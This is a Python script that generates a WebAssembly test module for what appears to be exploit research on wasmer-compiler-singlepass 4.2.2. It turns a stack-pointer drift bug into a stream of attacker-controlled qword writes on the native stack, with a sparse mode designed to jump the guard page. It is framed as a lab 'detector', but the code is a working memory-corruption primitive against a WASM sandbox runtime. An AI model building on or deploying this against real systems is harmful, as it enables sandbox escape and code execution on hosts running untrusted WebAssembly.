#!/usr/bin/env python3
"""Generate the E1 write-stream detector pattern for the wasmer labs.

Goal: prove that the Hexens drift emits attacker-controlled qwords at
successively lower native-stack addresses.

Mechanism (wasmer-compiler-singlepass 4.2.2, `emit_call_native`):
  before every call to an imported function it does
      let used_gprs = self.machine.get_used_gprs();
      self.machine.push_used_gpr(&used_gprs)?;      // rsp-relative writes!
  and pops them after the call. The pushed values are the live register
  contents. With the drift moving rsp down 16 B/iteration, those pushes
  write attacker-chosen qwords at drifting addresses -> the qword stream.

Pattern requirements:
  * live values are computed and DISTINCT: (i << 32) | K for K = 0..15, so the
    host callback can recognise them by (v >> 32) == i and (v & 0xffffffff) < 64;
  * the host call happens BEFORE the live values are dropped, so the register-
    resident live values are still allocated when `push_used_gpr` runs;
  * the call passes the loop index i as its first argument so the callback
    knows the current iteration;
  * the drift site (result-bearing if with a memory-backed then-result) is
    unchanged from the proven P1 shape.

Usage: python3 gen_writestream.py [out.wat]
"""

import sys

LIVE = 16


def live_expr(k: int) -> str:
    return (
        "(i64.or (i64.shl (i64.extend_i32_u (local.get $i)) (i64.const 32)) "
        f"(i64.const {k}))"
    )


def main() -> None:
    out = sys.argv[1] if len(sys.argv) > 1 else "patterns/ws_drift.wat"
    call_every = int(sys.argv[2]) if len(sys.argv) > 2 else 1
    offset = int(sys.argv[3]) if len(sys.argv) > 3 else 0
    assert call_every >= 1 and (call_every & (call_every - 1)) == 0, "call_every must be a power of 2"
    assert 0 <= offset < call_every, "offset must be < call_every"
    lines = [
        ";; E1/E3 write-stream detector (generated by gen_writestream.py).",
        f";; call_every={call_every} (1 = dense stream; >1 = sparse stream that can jump the guard page)",
        "(module",
        '  (import "env" "probe" (func $host (param i32 i32 i32) (result i32)))',
        "  (memory 1)",
        '  (data (i32.const 0) "\\01\\00\\00\\00")',
        '  (func (export "run") (param $iters i32) (result i32)',
        "    (local $i i32)",
        "    (block $exit",
        "      (loop $l",
        "        ;; live computed values (i << 32) | K, K = 0..15",
    ]
    for k in range(LIVE):
        lines.append(f"        {live_expr(k)}")
    lines += [
        "        ;; condition (nonzero) -> then branch",
        "        (i32.load (i32.const 0))",
        "        (if (result i64)",
        "          (then",
        "            (i64.add (i64.extend_i32_u (local.get $i)) (i64.const 0x12345678)))",
        "          (else",
        "            (i64.extend_i32_u (local.get $i))))",
        "        drop",
        "        ;; host call while the live values are still allocated:",
        "        ;; push_used_gpr writes them at the (drifted) rsp",
    ]
    if call_every > 1:
        lines += [
            f"        ;; sparse: call when (i + {offset}) % {call_every} == 0 -> batches jump {16 * call_every} bytes",
            f"        (i32.eqz (i32.and (i32.add (local.get $i) (i32.const {offset})) (i32.const {call_every - 1})))",
            "        (if (then",
            "          (call $host (local.get $i) (i32.const 0) (i32.const 0))",
            "          drop))",
        ]
    else:
        lines += [
            "        (call $host (local.get $i) (i32.const 0) (i32.const 0))",
            "        drop",
        ]
    lines += [
        "        ;; release the live values",
        "        " + " ".join(["drop"] * LIVE),
        "        ;; loop control",
        "        (local.set $i (i32.add (local.get $i) (i32.const 1)))",
        "        (br_if $l (i32.lt_u (local.get $i) (local.get $iters)))",
        "      )",
        "    )",
        "    (local.get $i)",
        "  )",
        ")",
        "",
    ]
    with open(out, "w") as f:
        f.write("\n".join(lines))
    print(f"wrote {out}: live={LIVE}")


if __name__ == "__main__":
    main()
